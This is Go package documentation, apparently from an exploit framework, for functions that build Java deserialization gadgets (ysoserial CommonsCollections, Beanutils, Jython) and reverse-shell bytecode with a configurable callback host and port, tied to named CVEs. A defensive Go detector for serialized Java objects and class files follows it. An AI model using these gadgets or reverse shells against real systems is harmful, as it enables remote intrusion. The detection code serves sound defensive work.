Documentation

Index
- func Commons10CommandBytecode(commandStr string) (string, error)
- func Commons6ModifiedBashCommandBytecode(commandStr string) (string, error)
- func CreateBeanutilsReverseShell(lhost string, lport int) string
- func CreateJythonRunCodeGadget(payload string) string
- func ErrorInvalidCommandLength(msg string) error
- func ReverseShellBytecode(conf *config.Config) (string, string)
- func ReverseShellScriptingEngineBytecode(conf *config.Config) (string, string)
Constants
This section is empty.
Variables
This section is empty.
Functions
func Commons10CommandBytecode (added in v1.40.0)
Generated using ysoserial with the CommonsCollections10 gadget.
func Commons6ModifiedBashCommandBytecode (added in v1.40.0)
This payload was generated using ysoserial-modified with the CommonsCollections6 gadget and the bash shell argument. The benefit of this payload over one generated from the unmodified ysoserial is that you do not need to prepend it with bash -c, and the spaces do not need to be replaced with $IFS. It also solves redirection issues that are present in unmodified ysoserial payloads. This payload will always run the provided command using bash, hence the name. That said, you should not need, nor should you, prepend a <shell> -c to the commandStr parameter passed here.
func CreateBeanutilsReverseShell
This is a serialized Java reverse shell. The gadget was generated by ysoserial, but using the code in this pull request: https://github.com/frohoff/ysoserial/pull/96 and updated to make it easy to swap in the desired lhost and lport without having to recreate the gadget.
The gadget works on both Windows and Linux and will automatically detect the platform and tool to use for executing commands (cmd.exe or /bin/bash).
func CreateJythonRunCodeGadget (added in v1.1.0)
This function generates a serialized Jython payload that executes arbitrary Python. It is the "runcode" variation of Steven Seeley and Rocco Calvi's Jython2 gadget:
https://github.com/frohoff/ysoserial/pull/200/files
The payload can be used like so:
java.CreateJythonRunCodeGadget(payload.UnflattenedSecureReversePython27(conf.Lhost, conf.Lport))
The payload was serialized and tested on Java 11.
func ErrorInvalidCommandLength (added in v1.39.0)
func ReverseShellBytecode (added in v1.8.1)
This is the Java bytecode for a reverse shell. You can find the source code here:
https://gist.github.com/j-baines/38eb6d16eed64986a369f7f981f57508
The code checks if the victim is Windows or Linux and uses bash or cmd.exe accordingly. The use case for this is when remotely loading a class (see CVE-2020-7961) or loading a class from a byte string (see CVE-2023-22527).
The bytecode was generated using OpenJDK 1.8.0. The exact method of generation follows:
    albinolobster@mournland:/tmp/java$ java -version
    openjdk version "1.8.0_392"
    OpenJDK Runtime Environment (build 1.8.0_392-8u392-ga-1~20.04-b08)
    OpenJDK 64-Bit Server VM (build 25.392-b08, mixed mode)
    albinolobster@mournland:/tmp/java$ javac ABCDEFG.java
    albinolobster@mournland:/tmp/java$ ls -l ABCDEFG.class
    -rw-rw-r-- 1 albinolobster albinolobster 2129 Feb 17 06:08 ABCDEFG.class
This function replaces the hardcoded IP address and port in the bytecode and generates a random class name. The return values are (bytecode, classname).
func ReverseShellScriptingEngineBytecode (added in v1.26.0)
This is the Java bytecode for a reverse shell. You can find the source code here:
https://gist.github.com/j-shomo/053031f2ee9ba7f29fca2305c6ea8c6a
The code checks if the victim is Windows or Linux and uses bash or cmd.exe accordingly. The use case for this is when remotely loading a class via ScriptEngineManager calling URLClassLoader (see CVE-2024-37084).
The bytecode was generated using OpenJDK 1.8.0. The exact method of generation follows:
    parallels@ubuntu-linux-22-04-02-desktop:~/Downloads$ java -version
    openjdk version "1.8.0_422"
    OpenJDK Runtime Environment (build 1.8.0_422-8u422-b05-1~22.04-b05)
    OpenJDK 64-Bit Server VM (build 25.422-b05, mixed mode)
    parallels@ubuntu-linux-22-04-02-desktop:~/Downloads$ javac Reverse.java
    parallels@ubuntu-linux-22-04-02-desktop:~/Downloads$ ls -l Reverse.class
    -rw-rw-r-- 1 parallels parallels 3124 Sep 20 12:58 Reverse.class
This function replaces the hardcoded IP address and port in the bytecode and generates a random class name. The return values are (bytecode, classname).
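The functions above return two kinds of artifact: serialized Java object streams (the Commons, Beanutils and Jython gadgets) and raw JVM class files (the two bytecode functions, compiled with javac as shown). The Go below is an added defensive example, not part of this package, showing how a defender can recognise either artifact in untrusted input such as a request body or an uploaded file: it matches the ObjectOutputStream header (0xACED0005), the class-file magic (0xCAFEBABE, with the major version read from bytes 6-7, 52 meaning Java 8), and retries after base64 decoding because serialized objects commonly travel as the familiar "rO0AB..." string. The names Classify, Finding, classifyRaw and firstClassName are assumptions of this example, and the two sample byte strings are constructed, not real payloads.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"encoding/binary"
	"fmt"
)

// Finding summarises what an untrusted blob looks like.
type Finding struct {
	Kind       string // "serialized-object", "class-file" or "other"
	Base64     bool   // the blob only matched after base64 decoding
	ClassMajor uint16 // class-file major version (52 == Java 8); 0 when not a class file
	FirstClass string // first class descriptor name in a serialized stream; "" if not parseable
}

var (
	// ObjectOutputStream header: STREAM_MAGIC (0xACED) followed by STREAM_VERSION (5).
	serialMagic = []byte{0xAC, 0xED, 0x00, 0x05}
	// JVM class-file magic.
	classMagic = []byte{0xCA, 0xFE, 0xBA, 0xBE}
)

// firstClassName reads the class name from a stream body that starts with
// TC_OBJECT (0x73), TC_CLASSDESC (0x72) and a 2-byte length-prefixed
// modified-UTF-8 name. Any other layout returns "".
func firstClassName(body []byte) string {
	if len(body) < 4 || body[0] != 0x73 || body[1] != 0x72 {
		return ""
	}
	n := int(binary.BigEndian.Uint16(body[2:4]))
	if len(body) < 4+n {
		return ""
	}
	return string(body[4 : 4+n])
}

// classifyRaw matches the two magic prefixes on raw bytes.
func classifyRaw(b []byte) Finding {
	switch {
	case bytes.HasPrefix(b, serialMagic):
		return Finding{Kind: "serialized-object", FirstClass: firstClassName(b[4:])}
	case bytes.HasPrefix(b, classMagic) && len(b) >= 8:
		// bytes 4-5 are minor_version, bytes 6-7 are major_version.
		return Finding{Kind: "class-file", ClassMajor: binary.BigEndian.Uint16(b[6:8])}
	}
	return Finding{Kind: "other"}
}

// Classify inspects a blob as-is and, if nothing matches, again after base64
// decoding, since serialized Java objects are commonly transported base64
// encoded (the "rO0AB" prefix is the encoding of 0xACED0005).
func Classify(b []byte) Finding {
	if f := classifyRaw(b); f.Kind != "other" {
		return f
	}
	if dec, err := base64.StdEncoding.DecodeString(string(bytes.TrimSpace(b))); err == nil {
		if f := classifyRaw(dec); f.Kind != "other" {
			f.Base64 = true
			return f
		}
	}
	return Finding{Kind: "other"}
}

// Constructed samples (not real payloads): a truncated serialized stream whose
// first class descriptor is java.lang.Object, and a class-file header with
// major version 0x34 == 52 (Java 8, the javac output described above).
var (
	SampleSerialized = append([]byte{0xAC, 0xED, 0x00, 0x05, 0x73, 0x72, 0x00, 0x10}, "java.lang.Object"...)
	SampleClassFile  = []byte{0xCA, 0xFE, 0xBA, 0xBE, 0x00, 0x00, 0x00, 0x34, 0x00, 0x00}
)

func main() {
	for _, in := range [][]byte{
		SampleSerialized,
		[]byte(base64.StdEncoding.EncodeToString(SampleSerialized)),
		SampleClassFile,
		[]byte("plain request body"),
	} {
		fmt.Printf("%+v\n", Classify(in))
	}
}
```

A hit on either magic in a parameter that should only ever carry text is a strong signal on its own; the first class descriptor name is what a triage analyst would then match against known gadget-chain classes, and the class-file major version tells you which JVM the bytecode was built for.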
Types
This section is empty.